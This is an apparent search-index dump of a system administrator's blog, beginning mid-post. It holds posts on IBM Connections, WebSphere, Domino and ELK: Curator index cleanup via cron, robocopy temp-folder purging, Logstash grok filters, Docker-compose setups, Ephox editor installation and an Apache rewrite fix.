logstash-2017.05.08 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.09 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.03 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.04.28 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.04.27 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.04.26 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.18 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.15 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.12 2017-05-31 08:17:01,797 INFO ---deleting index logstash-2017.05.11 2017-05-31 08:17:02,130 INFO Action ID: 1, \u0026#34;delete_indices\u0026#34; completed. 2017-05-31 08:17:02,130 INFO Preparing Action ID: 2, \u0026#34;delete_indices\u0026#34; 2017-05-31 08:17:02,133 INFO Trying Action ID: 2, \u0026#34;delete_indices\u0026#34;: Delete heapster prefixed indices. Ignore the error if the filter does not result in an actionable list of indices (ignore_empty_list) and exit cleanly. 2017-05-31 08:17:02,161 INFO Deleting selected indices: [u\u0026#39;heapster-2017.04.26\u0026#39;, u\u0026#39;heapster-2017.04.27\u0026#39;, u\u0026#39;heapster-2017.04.28\u0026#39;, u\u0026#39;heapster-2017.05.03\u0026#39;, u\u0026#39;heapster-2017.05.15\u0026#39;, u\u0026#39;heapster-2017.05.12\u0026#39;, u\u0026#39;heapster-2017.05.11\u0026#39;, u\u0026#39;heapster-2017.05.09\u0026#39;, u\u0026#39;heapster-2017.05.08\u0026#39;]2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.04.26 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.04.27 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.04.28 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.03 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.15 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.12 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.11 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.09 2017-05-31 08:17:02,161 INFO ---deleting index heapster-2017.05.08 2017-05-31 08:17:02,366 INFO Action ID: 2, \u0026#34;delete_indices\u0026#34; completed. 2017-05-31 08:17:02,367 INFO Job completed. I checked the log file daily after the research and after running the task manually the cron job is working as expected and curator does it’s job. No full disk since last week.\nCFC uses kubernetes and so stopping the clean-indices container creates a new one immediately! All changes disappear then and the cronjob stops working. I don’t want to wait until IBM provides a container update, so I searched a way to run the curator even with a new container on a regular basis.\nI created a script:\n#!/bin/bash id=`docker ps | grep indices-cleaner | awk \u0026#39;{print $1}\u0026#39;` docker exec -t $id /clean-indices.sh docker exec -t $id tail /var/log/curator-cron.log and added it to my crontab on the CFC server.\ncrontab -e 59 23 * * * script \u0026gt;\u0026gt; /var/log/curator.log When you use Kibana to analyse the logs, you maybe want to have more indices available. docker inspect containerid shows us:\n\u0026#34;Mounts\u0026#34;: [ { \u0026#34;Type\u0026#34;: \u0026#34;bind\u0026#34;, \u0026#34;Source\u0026#34;: \u0026#34;/etc/cfc/conf/curator-action.yml\u0026#34;, \u0026#34;Destination\u0026#34;: \u0026#34;/action.yml\u0026#34;, \u0026#34;Mode\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;RW\u0026#34;: true, \u0026#34;Propagation\u0026#34;: \u0026#34;\u0026#34; }, So you can edit the file /etc/cfc/conf/curator-action.yml on the CFC host instead of the container file and your changes will be persistent.\n","excerpt":"\u003cp\u003eWith \u003ca href=\"http://www-03.ibm.com/software/products/en/conn\" target=\"_blank\"\u003eIBM Connections 6 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nyou can deploy the\n\u003ca href=\"https://www.ibm.com/blogs/ibm-social-software/2017/03/28/ibm-connections-6-0-officially-announced/\" target=\"_blank\"\u003eadditional\ncomponent Orient Me \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which provides the first microservices which will\nbuild the new IBM Connections pink. Orient Me is installed on top of\n\u003ca href=\"https://www.ibm.com/developerworks/community/groups/service/html/communityoverview?communityUuid=fe25b4ef-ea6a-4d86-a629-6f87ccf4649e\" target=\"_blank\"\u003eIBM\nSpectrum Conductor for Containers \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (CFC) a new product to help with\nclustering and orchestrating of the Docker containers.\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-06-01-orient-me-elasticsearch-and-disk-space/","title":"Orient Me, Elasticsearch and Disk space"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cli/","title":"CLI"},{"body":"Since some versions of IBM Connections, it is mandatory to delete temp and wstemp of your Connections node after deployment or updates, or you end up with an old layout/design of Connections GUI.\nOn a Windows Server System this can be a pain, because within temp/wstemp WebSphere Application Server creates a folder structure with nodename / application server name and so on. In must cases the delete ends with the message “path too long”.\nSo you can start and rename the folders and try to delete over and over again. A time consuming activity and you need to do several times during an update.\nThere are several tips around, but most of them need an extra tool installed. I searched for a solution for this for a long time, but never blogged about the way I normally use to avoid this. I remembered during a skype discussion with other Connections guys some days ago, so here is the easiest and fasted way to get rid of long paths:\nPath too long? Use Robocopy (thanks Bert van Langen)\nRobocopy is a great tool and it is installed by default since Windows Server 2008, I use it during migrations to move the IBM Connections shared data to an other place, but it’s easy to create an empty folder and move it to the temp folder of the WebSphere Application server node.\nHere as an example:\nmkdir d:\\empty robocopy d:\\empty D:\\IBM\\WebSphere\\AppServer\\profiles\\AppSrv01\\temp /purge But be careful, robocopy is not using the trash, so when you type the wrong path, or forget the , you end up with searching the backup tapes.\n","excerpt":"\u003cp\u003eSince some versions of IBM Connections, it is mandatory to delete temp\nand wstemp of your Connections node after deployment or updates, or you\nend up with an old layout/design of Connections GUI.\u003c/p\u003e\n\u003cp\u003eOn a Windows Server System this can be a pain, because within\ntemp/wstemp WebSphere Application Server creates a folder structure with\nnodename / application server name and so on. In must cases the delete\nends with the message “path too long”.\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-04-10-deleting-temp-and-wstemp-on-microsoft-windows-server/","title":"Deleting temp and wstemp on Microsoft Windows Server"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tools-i-use/","title":"Tools I Use"},{"body":"This year I attended IBM Connect in San Francisco. In my eyes it was a great event and I enjoyed it very much.\nSome announcements are very important for the future and evolution of the IBM portfolio:\n* IBM Connections Pink – Jason Gary and the IBM Development team showed the future of IBM Connections. The basis will be Docker and a lot of other Opensource products. I see forward to work with a complete new stack and be very curious on deployment, migration and scaling. It is a complete rewrite and will not longer need DB2 or WebSphere. A good summarize was written by Glenn Kline. * panagenda ApplicationInsight – all IBM Domino customers with valid maintenance will get ApplicationInsights to analyze the code and usage of their Domino databases * IBM Domino will be updated through feature packs, we will get Java 8 and other long awaited functionality * IBM announced a new lifetime IBM Champion: Julian Robichaux , big congrats to him and well deserved\nJust a few session slides are available through the official conference page (we provided them, but they are still not available), so we uploaded ours to slideshare:\nBest and Worst Practices for Deploying IBM Connections IBM Connections Adminblast All other session slides of my panagenda colleagues can be found in the panagenda slideshare account .\nUpdate During the 11 hour flight to San Francisco I used the time to update the XPages and Generic HTML Widgets (OpenNTF) for IBM Connections 5.5 CR2. Frank van der Linden uploaded the changes today .\n","excerpt":"\u003cp\u003eThis year I attended IBM Connect in San Francisco. In my eyes it was a\ngreat event and I enjoyed it very much.\u003c/p\u003e\n\u003cp\u003eSome announcements are very important for the future and evolution of\nthe IBM portfolio:\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-03-02-ibm-connect-2017-slides-news-and-so/","title":"IBM Connect 2017 – slides, news and so"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/san-francisco/","title":"San Francisco"},{"body":"Sutol Best and Worst practices deploying IBM Connections IBM Connect 2016 Best and Worst Practices Deploying IBM Connections 2016 TDI Solutions Best Practices with IBM Connections Deployments ","excerpt":"\u003ch2 id=\"sutol\"\u003eSutol \u003ca href=\"#sutol\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/sutol-ibmcnxbestpractises.pdf\" target=\"_blank\"\u003eBest and Worst practices deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"ibm-connect-2016\"\u003eIBM Connect 2016 \u003ca href=\"#ibm-connect-2016\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2016-02-01-bestandworstpractices-final.pdf\" target=\"_blank\"\u003eBest and Worst Practices Deploying IBM Connections 2016 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2016-02-02-tdibestpractises-final.pdf\" target=\"_blank\"\u003eTDI Solutions Best Practices with IBM Connections Deployments \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2016/","title":"Talks 2016"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/domino/","title":"Domino"},{"body":"Last week I had an issue that some Domino Server didn’t provide SSO through SPNEGO any longer (environment worked for over 2 years now). This environment uses the customized domcfg.nsf template of Andreas Artner , maybe it’s related, but I don’t think so, on Windows 7 with latest Internet Explorer 11 and Domino Servers 9.0.1 with latest fix pack.\nSo what happened? The Domino servers are placed in the “Local Intranet Zone” of IE through Group Policy from beginning. The Windows administrators started to enable “Enterprise Mode” for better handling of compatibility mode and one of the steps is to deactivate the “Display intranet sites in compatibility View” option.\nAfter this, all sites which are not explicitly configured in “Enterprise Mode” are loading in “Edge Mode” and not longer in quirks mode.\nNearly everything worked fine, XPages load every HTML5 Element, the sites seem to deliver content faster and so on.\nBUT: The configured SPNEGO authentication does not load any longer. The domcfg.nsf loads directly the fallback login form. I analyzed with Fiddler 4 , but nothing suspicious was in the trace. So we configured one Domino Url to load in Quirks Mode (IE Level 5) and Desktop SSO worked immediately. So we played with the different levels and it showed that only the “Edge Mode” in IE11 made problems, when we went a step back and used the IE 10 compatibility mode everything worked: XPages, HTML5 and Desktop Single Sign-On.\nI hope this saves you some time during troubleshooting, I think the Enterprise Mode is a trending thing and removing the Quirks Mode is an important step.\n","excerpt":"\u003cp\u003eLast week I had an issue that some Domino Server didn’t provide SSO\nthrough SPNEGO any longer (environment worked for over 2 years now).\nThis environment uses the\n\u003ca href=\"https://www.openntf.org/main.nsf/project.xsp?r=project/Custom%20Login%20Page\" target=\"_blank\"\u003ecustomized\ndomcfg.nsf template \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n of \u003ca href=\"http://tdiblog.anderls.com/\" target=\"_blank\"\u003eAndreas Artner \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nmaybe it’s related, but I don’t think so, on Windows 7 with latest\nInternet Explorer 11 and Domino Servers 9.0.1 with latest fix pack.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-08-21-internet-explorer-edge-mode-without-spnego-sso/","title":"Internet Explorer – Edge Mode without SPNEGO SSO"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/kerberos/","title":"Kerberos"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/spnego/","title":"SPNEGO"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sso/","title":"SSO"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/install/","title":"Install"},{"body":"This week I installed IBM Connections 5.5CR1 on a Windows Server. I used WebSphere Application Server 8.5.5.9 and everything ran pretty smooth, but the Connections install itself ended in an error after all applications were successfully installed.\nThe popup showed a regexp error and a long string. The installer ran through the night, so I couldn’t remember this string and started the install again. The Same message box appears after everything was successfully installed (checked through ISC, after the error everything was uninstalled by the Installation Manager) and even the install.log showed nothing special.\nThis time, I remembered the string, it was the password of my WebSphere Administration user! The password looked like this:\n960n4gv343te6f(\nAfter removing the bracket and replaced it with another special character everything was installed without error. So be careful with special characters and IBM Installations.\nI never had an issue with special characters, but I know that the Sametime documentation mentions that space, @ and ! can be a problem.\n","excerpt":"\u003cp\u003eThis week I installed IBM Connections 5.5CR1 on a Windows Server. I used\nWebSphere Application Server 8.5.5.9 and everything ran pretty smooth,\nbut the Connections install itself ended in an error after all\napplications were successfully installed.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-08-20-regexp-error-during-connections-install/","title":"Regexp error during Connections install"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/windows-server/","title":"Windows Server"},{"body":"","excerpt":"","ref":"https://stoeps.de/search-index/","title":""},{"body":"Last week I wrote a post about Using Docker and ELK to Analyze WebSphere Application Server SystemOut.log , but i wasn’t happy with my date filter and how the websphere response code is analyzed. The main problem was, that the WAS response code is not always on the beginning of a log message, or do not end with “:” all the time.\nI replaced the used filter (formerly 4 lines with match) with following code:\ngrok { # was_shortname need to be regex, because numbers and $ can be in the word match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:wastimestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} (?\u0026lt;was_shortname\u0026gt;\\b[A-Za-z0-9\\$]{2,}\\b) %{SPACE}%{WORD:was_loglevel}%{SPACE} %{GREEDYDATA:message}\u0026#34;] overwrite =\u0026gt; [ \u0026#34;message\u0026#34; ] #tag_on_failure =\u0026gt; [ ] } grok { # Extract the WebSphere Response Code match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;(?\u0026lt;was_responsecode\u0026gt;[A-Z0-9]{9,10})[:,\\s\\s]\u0026#34;] tag_on_failure =\u0026gt; [ ] } You see i replaced the different patterns with a regular expression to find the response code. tag_on_failure ⇒ [] prevents generating an error, when no resonse code was logged.\nNow i’m able to use was_responsecode to generate a graph with the different response codes over a timeline, so i’m able to see when errors appear more often.\nExample I created a new search for was_loglevel:E AND was_responsecode:* (show me all log messages with a response code and of loglevel E) and created a line chart on basis of this search:\nYou see a strong peak for one of the response codes:\nNow we get the information, that CLFRW0034E is the reponse code of this peak. Let’s check what log message comes with this code:\ncom.ibm.connections.search.index.process.incremental.IndexBuilder buildService CLFRW0034E: Error reading or writing to the index directory. Please check permissions and capacity. Ok, that’s quite interesting, disk full or problem with NAS, NFS or something like this. I know this issue is already solved, because no more errors after this peak, but when kibana would send me an information when some error counts increase (and that’s possible) it would be great.\nAdding timezone To get the time in my local timezone or utc, even when the log was generated outside in an other timezone, i added following lines:\n# add timezone information translate { field =\u0026gt; \u0026#39;tz\u0026#39; destination =\u0026gt; \u0026#39;tz_num\u0026#39; dictionary =\u0026gt; [ \u0026#39;CET\u0026#39;, \u0026#39;+0100\u0026#39;, \u0026#39;CEST\u0026#39;, \u0026#39;+0200\u0026#39;, \u0026#39;EDT\u0026#39;, \u0026#39;-0400\u0026#39; ] } mutate { replace =\u0026gt; [\u0026#39;timestamp\u0026#39;, \u0026#39;%{wastimestamp} %{tz_num}\u0026#39;] } I need to install the translate plugin for logstash and you need to extend the list of timezones manually:\n/opt/logstash/bin/logstash-plugin install logstash-filter-translate Add plugins to Docker container Since this weekend i like Docker more and more. It’s really easy to test different filters (i work on IBM Domino console.log filter and additional filebeat stuff) and restart with a clean environment again.\nThe official images for ELK do not have all plugins i wanted to use installed, so i need to create my own Docker containers for ElasticSearch and Logstash, only small changes were need for docker-compose.\nDockerfile Elasticsearch FROM elasticsearch:latest RUN bin/plugin install lmenezes/elasticsearch-kopf Creating elasticsearch container:\ndocker build -t \u0026#34;stoeps:elasticsearch\u0026#34; . Dockerfile Logstash FROM logstash:latest # Install logstash-input-beats RUN /opt/logstash/bin/logstash-plugin install logstash-input-beats \u0026amp;\u0026amp; /opt/logstash/bin/logstash-plugin install logstash-filter-translate Creating logstash container:\ndocker build -t \u0026#34;stoeps:logstash\u0026#34; . Docker-compose.yml elasticsearch: image: stoeps:elasticsearch ... logstash: image: stoeps:logstash ... ports: - \u0026#34;5000:5000\u0026#34; - \u0026#34;5044:5044\u0026#34; ... So you see i changed the image names to the container names i created before and i added an extra port to enable filebeat.\n","excerpt":"\u003cp\u003eLast week I wrote a post about\n\u003ca href=\"https://www.stoeps.de/using-docker-to-analyze-websphere-application-server-systemout-log/\" target=\"_blank\"\u003eUsing Docker and ELK to Analyze WebSphere Application Server SystemOut.log \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nbut i wasn’t happy with my date filter and how the websphere response\ncode is analyzed. The main problem was, that the WAS response code is\nnot always on the beginning of a log message, or do not end with “:” all\nthe time.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-05-29-better-logstash-filter-to-analyze-systemout-log-and-some-more/","title":"Better logstash filter to analyze SystemOut.log and some more"},{"body":"I often get SystemOut.log files from customers or friends to help them analyzing a problem. Often it is complicated to find the right server and application which generates the real error, because most WebSphere Applications (like IBM Connections or Sametime) are installed on different Application Servers and Nodes. So you need to open multiple large files in your editor, scroll each to the needed timestamps and check the lines before for possible error messages.\nKlaus Bild showed on several conferences and in his blog the functionality of ELK, so I thought about using ELK too. I started to build a virtual machine with ELK Stack (Elasticsearch, Logstash \u0026amp; Kibana) and imported my local logs and logs i got mailed. This way is cool to analyze your environment, but adding just some SystemOut.logs from outside is not the best way. It’s hard to remove this stuff after analyzing from a ELK instance.\nThen I found a tutorial to install ELK with Docker, there is even a great Part 2 of this post, which helps us installing an ELK Cluster. Just follow this blog posts, install Docker and Docker-compose. It’s really fast deployed. In my case i do not use flocker, it’s enough to use a local data container for the elasticsearch data.\nWhy do I use Docker instead of a virtual machine? It’s super easy to just drop the data container and begin with an empty database.\nMy setup I created a folder on my Mac to put all needed stuff for the Docker images to it:\nmkdir elk cd elk Create a file Docker-compose.yaml with following content:\nelasticsearch: image: elasticsearch:latest command: elasticsearch -Des.network.host=0.0.0.0 ports: - \u0026#34;9200:9200\u0026#34; - \u0026#34;9300:9300\u0026#34; volumes: - elasticsearch1:/usr/share/elasticsearch/data logstash: image: logstash:latest command: logstash -f /etc/logstash/conf.d volumes: - ./conf.d:/etc/logstash/conf.d - ./logs:/opt/logs ports: - \u0026#34;5000:5000\u0026#34; links: - elasticsearch kibana: image: kibana ports: - \u0026#34;5601:5601\u0026#34; links: - elasticsearch environment: - ELASTICSEARCH_URL=http://elasticsearch:9200 So you see that elasticsearch is using a data-container for /usr/share/elasticsearch/data and logstash reads the configuration from a local folder ./conf.d and we map an additional local folder logs to /opt/logs. This log folder will be used to copy SystemOut.logs for analyzation to it.\nelk/conf.d I splitted my logstash configuration to multiple files, but you can copy them together if you want.\nelk/conf.d/10-websphere-input.conf input { file { path =\u0026gt; [ \u0026#34;/opt/logs/*/*/SystemOut.log\u0026#34; ] start_position =\u0026gt; \u0026#34;beginning\u0026#34; type =\u0026gt; \u0026#34;websphere\u0026#34; # important! logstash read only logs from files touched the last 24 hours # 8640000 = 100 days ignore_older =\u0026gt; \u0026#34;8640000\u0026#34; } } You can see that i added // in front of the log file. This will be used to tag the log messages with company and servername, so i can search and filter on basis of these tags. So i assume that the first folder after /opt/logs is the company (or test/production) and the second folder will be the servername.\nelk/conf.d/50-websphere-filter.conf filter { multiline{ # Nothing will pass this filter unless it is a new event ( new [2014-03-02 1.... ) # multiline adds java error traces to original log entry pattern =\u0026gt; \u0026#34;^\\[\u0026#34; what =\u0026gt; \u0026#34;previous\u0026#34; negate=\u0026gt; true } if [path] =~ \u0026#34;SystemOut.log\u0026#34; { grok { # get company and servernames from folder names match =\u0026gt; [\u0026#34;path\u0026#34;, \u0026#34;%{GREEDYDATA}/%{GREEDYDATA:company}/%{GREEDYDATA:server_name}/SystemOut.log\u0026#34;] } grok { match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{SPACE}%{SPACE}%{SPACE}%{WORD:was_errorcode}: %{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{SPACE}%{SPACE}%{SPACE} \\[%{GREEDYDATA:was_sibbus}\\] +%{WORD:was_errorcode}: %{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{GREEDYDATA:message2} +%{WORD:was_errorcode}: %{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{GREEDYDATA:message2}\\) +%{WORD:was_errorcode} +%{SPACE}%{GREEDYDATA:message}\u0026#34;] match =\u0026gt; [\u0026#34;message\u0026#34;, \u0026#34;\\[%{DATA:timestamp} %{WORD:tz}\\] %{BASE16NUM:was_threadID} %{WORD:was_shortname} %{SPACE}%{WORD:was_loglevel} %{SPACE}%{GREEDYDATA:message}\u0026#34;] overwrite =\u0026gt; [ \u0026#34;message\u0026#34; ] } date{ match =\u0026gt; [\u0026#34;timestamp\u0026#34;, \u0026#34;dd/MM/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;M/d/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;MM/d/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;M/dd/YY HH:mm:ss:SSS\u0026#34;, \u0026#34;MM/dd/YY H:mm:ss:SSS\u0026#34;, \u0026#34;M/d/YY H:mm:ss:SSS\u0026#34;, \u0026#34;MM/d/YY H:mm:ss:SSS\u0026#34;, \u0026#34;M/dd/YY H:mm:ss:SSS\u0026#34;] } } } I remove the timezone information of the timestamp, so if you need to know the local time of your system, you should adjust this (had problems with CEST and so on, so i just removed it).\nI tried to get the most informations i can, but the filter is not complete until now, some message do not provide us the right error_code, but i think it is a good starting point.\nYou can use the same filter for SystemOut.logs sent through the network, or with other ELK tools, then the company and server information is not tagged.\nelk/conf.d/90-elasticsearch-output.conf output { if \u0026#34;_grokparsefailure\u0026#34; not in [tags] { elasticsearch { hosts =\u0026gt; \u0026#34;elasticsearch:9200\u0026#34; } } } Just the code that logstash forwards the log messages to elasticsearch with the additional tags and updated timestamps.\nThat’s pretty much all. Open a command window and change to the elk folder:\ncd elk docker-compose -f docker-compose.yml up -d Open http://localhost:5601 in your browser and you can start using kibana with your logs.\nWhen you want to reset the containers, just use:\ndocker-compose -f docker-compose.yml rm -f --all docker volume rm elasticsearch1 And after this you can create the containers again.\nStart using Kibana Open http://localhost:5601 in your favorite browser and configure the index pattern:\nI check rather old logfiles here, so i get following page on “Discover”:\nSo moving the timepicker a little bit and we see the first log messages:\nYou see we can expand a single message entry and check tags and informations, even the java error stacks (multiline) are grouped together, additionally to the error or log message we get all added fields we generated out of the log file:\nExample of multiline:\nExample of filtering and changing the view (only showing special error codes):\nSo now we can start custimizing the view filter for event type, error code and so on. Have fun to start analyzing with ELK.\n","excerpt":"\u003cp\u003eI often get SystemOut.log files from customers or friends to help them\nanalyzing a problem. Often it is complicated to find the right server\nand application which generates the real error, because most WebSphere\nApplications (like IBM Connections or Sametime) are installed on\ndifferent Application Servers and Nodes. So you need to open multiple\nlarge files in your editor, scroll each to the needed timestamps and\ncheck the lines before for possible error messages.\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-05-28-using-docker-to-analyze-websphere-application-server-systemout-log/","title":"Using Docker and ELK to Analyze WebSphere Application Server SystemOut.log"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/ephox/","title":"Ephox"},{"body":"Several people told me that installing the Editors is not described very well in the IBM Connections documentation. So i decided to write down the steps I used to deploy the editors. Hope it helps.\nCheck Installation on ephox: http://docs.ephox.com/display/EphoxForIBMConnections/Installing+Textbox.io+Services * Extract EPHOX_EDITORS3.0.1_CONN5.5.zip edit config/config.js * editor: 'textbox.io | EditLive | CKEditor | role-based'\n+ This sets the default editor. When you use role-based you can enable textbox.io and EditLive for different user groups.\n+ Be aware that editlive needs a Java plugin which is mostly deactivated or outdated in actual browsers. * Enable Spelling-Servie URL (you need to deploy tbioServices_c5.ear):\n+ spellingServiceUrl: \u0026quot;https://connections-host/ephox-spelling\u0026quot;\n+ You have to set to https, that spell-checking works with http and https access to Connections.\n+ If you have selected role-based, you must deploy the EphoxEditorsForConnections.ear * When you want to use the builtin spellchecking, you need to install services/tbioServices_c5.ear Start ./install.sh or install.exe\n+ * ./install.sh root@webspherehost \u0026lt;customization-dir\u0026gt; \u0026lt;webressources-dir\u0026gt;\n+ You need to type the root password 3 times, because installation uses seperate ssh calls for the installation * Create /opt/ephox/application.conf\n+ (WINDOWS: WAS_INSTALLATION_DRIVE:\\opt\\ephox\\application.conf)\nephox { allowed-origins { origins = [ \u0026#34;https://connections-55.panastoeps.local\u0026#34;, \u0026#34;http://connections-55.panastoeps.local\u0026#34; ], url = \u0026#34;https://connections-55.panastoeps.local/ephox-allowed-origins/cors\u0026#34; } } Map Applications to your webserver, update the Connections versionstamp and restart Common and Ephox Applications\nVerify: https://\u0026lt;your_server_and_port\u0026gt;/connections/resources/web/ephox.editors.connections/verify.html\n","excerpt":"\u003cp\u003eSeveral people told me that installing the Editors is not described very\nwell in the IBM Connections documentation. So i decided to write down\nthe steps I used to deploy the editors. Hope it helps.\u003c/p\u003e\n\u003cp\u003eCheck Installation on ephox:\n\u003ca href=\"http://docs.ephox.com/display/EphoxForIBMConnections/Installing\u0026#43;Textbox.io\u0026#43;Services\" target=\"_blank\"\u003ehttp://docs.ephox.com/display/EphoxForIBMConnections/Installing+Textbox.io+Services \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2016/2016-03-12-ibm-connections-5-5-install-ephox-editors/","title":"IBM Connections 5.5 install Ephox Editors"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/textbox.io/","title":"Textbox.io"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/fix/","title":"Fix"},{"body":"Wikis in IBM Connections 5.5 have a little bug, because the link (/library instead of /wikis/form/api/library) for images are wrong and so they are not displayed.\nThere is a technote , which should solve this issue, but the used way with ProxyPass is not what i want to use. When you use ProxyPass and ProxyPassReverse you should add a ProxyRequest off to be more secure. ProxyPass to localhost can be a problem too, i would suggest to change localhost to the Connections IHS Hostname.\nWhy do I use a different approach? Most of my deployments already use a RewriteRule to redirect the hostname to there Connections Homepage, so i don’t need an additional module (which needs ressources and can have security considerations), when i can solve the image issue through mod_rewrite.\nRewriteRule \u0026quot;^/library/(.*)\u0026quot; \u0026quot;/wikis/form/api/library/$1\u0026quot; [R,L]\nIf you haven’t set \u0026lt;forceConfidentialCommunications enabled=\u0026quot;true\u0026quot;/\u0026gt; in LotusConnections-config.xml you need to set the RewriteRule and the ProxyPass config within your http and your https configuration parts!\nExample httpd.conf: ... # HTTP configuration \u0026lt;VirtualHost *:80\u0026gt; ServerName connections.example.com RewriteEngine On # Redirect hostname to Homepage RewriteRule ^\\/$ https://connections.example.com/homepage [noescape,L,R] # Fix wrong wiki image URL RewriteRule \u0026#34;^/library/(.*)\u0026#34; \u0026#34;/wikis/form/api/library/$1\u0026#34; [R,L] \u0026lt;/VirtualHost\u0026gt; # HTTPS configuration \u0026lt;VirtualHost *:443\u0026gt; ServerName connections.example.com RewriteEngine On # Redirect hostname to Homepage RewriteRule ^\\/$ https://connections.example.com/homepage [noescape,L,R] # Fix wrong wiki image URL RewriteRule \u0026#34;^/library/(.*)\u0026#34; \u0026#34;/wikis/form/api/library/$1\u0026#34; [R,L] SSLEnable SSLProtocolDisable SSLv2 SSLv3 \u0026lt;/VirtualHost\u0026gt; ... ","excerpt":"\u003cp\u003eWikis in IBM Connections 5.5 have a little bug, because the link\n(\u003ccode\u003e/library\u003c/code\u003e instead of \u003ccode\u003e/wikis/form/api/library\u003c/code\u003e) for images are wrong\nand so they are not 